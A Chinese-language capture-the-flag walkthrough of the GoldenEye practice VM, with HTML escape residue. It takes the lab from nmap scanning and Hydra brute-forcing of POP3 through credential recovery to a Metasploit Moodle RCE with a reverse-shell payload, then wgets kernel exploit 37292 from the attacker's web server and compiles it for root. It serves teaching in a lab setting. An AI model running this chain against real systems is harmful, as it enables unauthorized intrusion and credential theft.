GoldenEye 渗透测试实战教学文档<\/h1>

1. 环境准备<\/h2>

攻击机<\/strong>: Kali Linux<\/li>
目标机<\/strong>: VMware 虚拟机 (IP: 192.168.111.133)<\/li>

免责声明<\/strong>: 本技术仅用于教育目的<\/li> <\/ul>
2. 信息收集阶段<\/h2>
2.1 初始扫描<\/h3>
nmap 192.168.111.133 <\/span><\/span><\/code><\/pre>发现开放端口<\/strong>:<\/p> 25 (SMTP)<\/li> 80 (HTTP)<\/li> <\/ul> 2.2 Web 初始访问<\/h3> 访问 http:\/\/192.168.111.133\/<\/code> 发现提示:<\/p> User: UNKNOWN Navigate to \/sev-home\/ to login <\/code><\/pre> 2.3 源代码分析<\/h3> 查看页面源代码，发现 terminal.js<\/code> 文件:<\/p> \/\/ 包含HTML编码的密码 <\/span><\/span><\/span><\/span>&<\/span>#<\/span>73<\/span>;&<\/span>#<\/span>110<\/span>;&<\/span>#<\/span>118<\/span>;&<\/span>#<\/span>105<\/span>;&<\/span>#<\/span>110<\/span>;&<\/span>#<\/span>99<\/span>;&<\/span>#<\/span>105<\/span>;&<\/span>#<\/span>98<\/span>;&<\/span>#<\/span>108<\/span>;&<\/span>#<\/span>101<\/span>;&<\/span>#<\/span>72<\/span>;&<\/span>#<\/span>97<\/span>;&<\/span>#<\/span>99<\/span>;&<\/span>#<\/span>107<\/span>;&<\/span>#<\/span>51<\/span>;&<\/span>#<\/span>114<\/span>; <\/span><\/span><\/code><\/pre>解密后密码<\/strong>: InvincibleHack3r<\/code><\/p> 3. Web 渗透<\/h2> 3.1 登录尝试<\/h3> 访问 http:\/\/192.168.111.133\/sev-home\/<\/code> 使用凭据:<\/p> 用户名: boris<\/code><\/li> 密码: InvincibleHack3r<\/code><\/li> <\/ul> 3.2 发现隐藏服务<\/h3> 在调试控制台发现提示:<\/p> "我们已将 pop3 服务配置为在非常高的非默认端口上运行"<\/p> <\/blockquote> 全端口扫描<\/strong>:<\/p> nmap -p- 192.168.111.133 <\/span><\/span><\/code><\/pre>发现端口<\/strong>:<\/p> 55006<\/li> 55007<\/li> <\/ul> 服务扫描<\/strong>:<\/p> nmap -sS -sV -T5 -A -p55006,55007 192.168.111.133 <\/span><\/span><\/code><\/pre>确认运行POP3邮件服务<\/p> 4. POP3 服务攻击<\/h2> 4.1 暴力破解<\/h3> 创建用户名单:<\/p> echo -e 'natalya\nboris'<\/span> > sun.txt <\/span><\/span><\/code><\/pre>使用Hydra爆破:<\/p> hydra -L sun.txt -P \/usr\/share\/wordlists\/fasttrack.txt 192.168.111.133 -s 55007<\/span> pop3 <\/span><\/span><\/code><\/pre>获取凭据<\/strong>:<\/p> natalya\/bird<\/li> boris\/secret1!<\/li> <\/ul> 4.2 邮件内容分析<\/h3> 使用NC查看邮件:<\/p> nc 192.168.111.133 55007<\/span> <\/span><\/span><\/code><\/pre>关键邮件内容<\/strong>:<\/p> 新用户信息:<\/p> 用户名: xenia<\/code><\/li> 密码: RCP90rulez!<\/code><\/li> 域名: severnaya-station.com\/gnocertdir<\/code><\/li> <\/ul> <\/li> 需要修改本地hosts文件:<\/p> 192.168.111.133 severnaya-station.com <\/code><\/pre> <\/li> <\/ol> 5. Moodle 系统渗透<\/h2> 5.1 初始访问<\/h3> 访问 severnaya-station.com\/gnocertdir<\/code> 使用凭据:<\/p> xenia\/RCP90rulez!<\/li> <\/ul> 5.2 进一步枚举<\/h3> 发现用户名 doak<\/code>，再次爆破POP3获取密码:<\/p> doak\/goat<\/li> <\/ul> 查看邮件获得新凭据:<\/p> dr_doak\/4England!<\/li> <\/ul> 5.3 管理员凭据获取<\/h3> 在Moodle中发现 s3cret.txt<\/code> 提示:<\/p> "管理员凭据已隐藏在映像文件中"<\/p> <\/blockquote> 下载并分析图片:<\/p> wget http:\/\/severnaya-station.com\/dir007key\/for-007.jpg <\/span><\/span>strings for<\/span>-007.jpg <\/span><\/span><\/code><\/pre>发现Base64编码: eFdpbnRlcjE5OTV4IQ==<\/code> 解码后获得密码: xWinter1995x!<\/code><\/p> 5.4 管理员访问<\/h3> 使用凭据:<\/p> admin\/xWinter1995x!<\/li> <\/ul> 6. 漏洞利用<\/h2> 6.1 识别漏洞<\/h3> Moodle版本: 2.2.3 相关漏洞: CVE-2013-3630 (远程代码执行)<\/p> 6.2 Metasploit利用<\/h3> msfconsole <\/span><\/span>search moodle <\/span><\/span>use exploit\/multi\/http\/moodle_cmd_exec <\/span><\/span>set username admin <\/span><\/span>set password xWinter1995x! <\/span><\/span>set rhosts severnaya-station.com <\/span><\/span>set targeturi \/gnocertdir <\/span><\/span>set payload cmd\/unix\/reverse <\/span><\/span>set lhost [<\/span>攻击机IP]<\/span> <\/span><\/span>set vhost severnaya-station.com <\/span><\/span>run <\/span><\/span><\/code><\/pre>6.3 获取交互式shell<\/h3> python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>7. 权限提升<\/h2> 7.1 系统信息收集<\/h3> uname -a <\/span><\/span><\/code><\/pre>输出: Linux ubuntu 3.13.0-32<\/p> 7.2 查找本地提权漏洞<\/h3> 搜索漏洞: Linux ubuntu 3.13.0-32 exploit 发现漏洞编号: 37292<\/p> 7.3 编译并执行exp<\/h3> 下载exp:<\/li> <\/ol> searchsploit 37292<\/span> <\/span><\/span>cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/37292.c \/tmp\/ <\/span><\/span><\/code><\/pre> 修改编译指令: 将脚本中的 gcc<\/code> 改为 cc<\/code><\/p> <\/li> 传输到目标:<\/p> <\/li> <\/ol> # 在攻击机启动web服务<\/span> <\/span><\/span>python -m SimpleHTTPServer 8081<\/span> <\/span><\/span> <\/span><\/span># 在目标机下载<\/span> <\/span><\/span>wget http:\/\/[<\/span>攻击机IP]<\/span>:8081\/37292.c <\/span><\/span><\/code><\/pre> 编译执行:<\/li> <\/ol> cc -o exp 37292.c <\/span><\/span>chmod +x exp <\/span><\/span>.\/exp <\/span><\/span><\/code><\/pre>7.4 获取flag<\/h3> cat \/root\/.flag.txt <\/span><\/span><\/code><\/pre>Flag<\/strong>: 568628e0d993b1973adc718237da6e93<\/code><\/p> 8. 总结<\/h2> 本次渗透测试完整流程:<\/p> 信息收集 → 2. Web渗透 → 3. 服务枚举 → 4. 暴力破解 → 5. 邮件分析 → 6. 系统渗透 → 7. 漏洞利用 → 8. 权限提升<\/li> <\/ol> 关键点在于细致的枚举分析和利用每一处信息泄露，最终通过已知漏洞获取系统完全控制权。<\/p>